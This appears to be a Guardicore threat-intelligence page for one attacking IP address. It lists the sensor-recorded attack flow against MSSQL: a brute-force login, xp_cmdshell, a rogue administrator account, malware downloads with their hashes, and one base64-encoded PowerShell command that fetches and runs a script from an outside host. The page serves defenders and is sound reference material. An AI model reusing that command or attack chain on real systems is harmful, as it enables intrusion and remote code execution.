IP Address: 202.90.136.186Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
202.90.136.186​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

MSSQL

Tags

IDS - Attempted User Privilege Gain Download and Execute SMB Share Connect Successful SMB Login Service Start Listening Scheduled Task Creation Service Creation Execute MsSql Shell Command User Created MSSQL Download File SMB Successful MSSQL Login CMD MSSQL Brute Force User Added to Group

Associated Attack Servers

-

Basic Information

IP Address

202.90.136.186

Domain

-

ISP

Department of Science and Technology

Country

Philippines

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-04-07

Last seen in Guardicore Centra

2019-11-05

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List (Part of a Brute Force Attempt)

Successful MSSQL Login MSSQL Brute Force

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User (Part of a Brute Force Attempt)

Successful MSSQL Login MSSQL Brute Force

MSSQL executed 2 shell commands

Execute MsSql Shell Command

User k8h3d was created with the password *********** added to groups: Administrators and logged in using SMB

User Created User Added to Group Successful SMB Login

A user logged in using SMB with the following username: k8h3d - Authentication policy: Correct Password

Successful SMB Login

The file C:\Windows\eNgiDGdF.exe was downloaded and executed

Download and Execute

c:\windows\system32\services.exe installed and started %systemroot%\engidgdf.exe as a service named wtTI under service group None

Service Start Service Creation

C:\Windows\temp\svchost.exe was downloaded

Download File

IDS detected Attempted User Privilege Gain : SQL sp_configure - configuration change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : sp_password - password change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : xp_cmdshell - program execution

IDS - Attempted User Privilege Gain

Process netsvcs Service Group started listening on ports: 65533

Listening

The command line powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Bluetool

Connection was closed due to timeout

Associated Files

\\server-backup\c$\zilnbirc.exe

SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71

56320 bytes

C:\Windows\temp\svchost.exe

SHA256: 0f366b50baab12a1e162a3f65380fc68bffaa6ee0ed6195aa601fc33d2b775eb

715000 bytes

C:\Windows\temp\svchost.exe

SHA256: 3360d28b9b39dd5b31ac0a13eb411aae83a6504c1b6739b917ccf2c8a88e8bfa

455000 bytes

C:\Windows\temp\svchost.exe

SHA256: 451ab54d9bd72d169f3d4caa26677059d3e55a8ac067c74230509bfe82e14f21

325000 bytes

C:\Windows\temp\svchost.exe

SHA256: 3fcaf42e17eecd794da2695cd3f9c3fc76e69cf8b01fb7b62f7b7331d153abcb

520000 bytes

C:\Windows\temp\svchost.exe

SHA256: c9f4f4788987b69ea452413d093d527d795ce8f961bc34d4ee5c0ca1f369d836

650000 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 202.90.136.186​Previously Malicious